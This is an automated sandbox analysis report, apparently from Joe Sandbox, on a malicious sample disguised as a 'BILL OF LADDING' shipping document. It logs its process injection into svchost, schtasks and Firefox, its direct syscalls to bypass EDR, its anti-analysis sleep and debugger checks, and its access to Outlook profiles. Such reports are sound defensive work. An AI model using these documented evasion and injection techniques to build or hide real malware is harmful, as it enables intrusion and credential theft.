        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wdscore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: riched32.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: BILL OF LADDING.exeStatic file information: File size 1356685 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dYBbPgrkLOIMQ.exe, 00000003.00000000.381930155.0000000000CFE000.00000002.00000001.01000000.00000004.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885232628.0000000000CFE000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: wntdll.pdb source: BILL OF LADDING.exe, 00000000.00000003.362588890.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, BILL OF LADDING.exe, 00000000.00000003.362826334.0000000003220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379892098.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400782126.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379476122.0000000000220000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400782126.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.401126417.0000000000820000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885160766.0000000002080000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885160766.0000000002200000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.401555831.0000000000980000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: sctasks.pdbbz source: svchost.exe, 00000002.00000002.400759281.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400759281.0000000000801000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000002.885011890.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000003.387643597.00000000007AA000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.885002432.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885346022.000000000292C000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000000.413893465.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.457375821.00000000015CC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: sctasks.pdb source: svchost.exe, 00000002.00000002.400759281.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400759281.0000000000801000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000002.885011890.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000003.387643597.00000000007AA000.00000004.00000001.00020000.00000000.sdmp
        Source: BILL OF LADDING.exeStatic PE information: real checksum: 0xa2135 should be: 0x14bb02
        Source: sqlite3.dll.4.drStatic PE information: section name: /4
        Source: sqlite3.dll.4.drStatic PE information: section name: /19
        Source: sqlite3.dll.4.drStatic PE information: section name: /31
        Source: sqlite3.dll.4.drStatic PE information: section name: /45
        Source: sqlite3.dll.4.drStatic PE information: section name: /57
        Source: sqlite3.dll.4.drStatic PE information: section name: /70
        Source: sqlite3.dll.4.drStatic PE information: section name: /81
        Source: sqlite3.dll.4.drStatic PE information: section name: /92
        Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file

        Boot Survival

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeAPI/Special instruction interceptor: Address: 3755B1C
        Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 9738Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
        Source: C:\Windows\SysWOW64\schtasks.exe TID: 3376Thread sleep count: 220 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exe TID: 3376Thread sleep time: -440000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exe TID: 3416Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exe TID: 3376Thread sleep count: 9738 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exe TID: 3376Thread sleep time: -19476000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe TID: 3384Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe TID: 3384Thread sleep time: -45000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe TID: 3384Thread sleep time: -36000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\schtasks.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess queried: DebugPortJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtClose: Direct from: 0x774CFA02
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\schtasks.exeThread APC queued: target process: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BILL OF LADDING.exe"Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: dYBbPgrkLOIMQ.exe, 00000003.00000002.885118091.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000000.381939867.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000000.413884188.0000000000D20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: dYBbPgrkLOIMQ.exe, 00000003.00000002.885118091.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000000.381939867.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000000.413884188.0000000000D20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
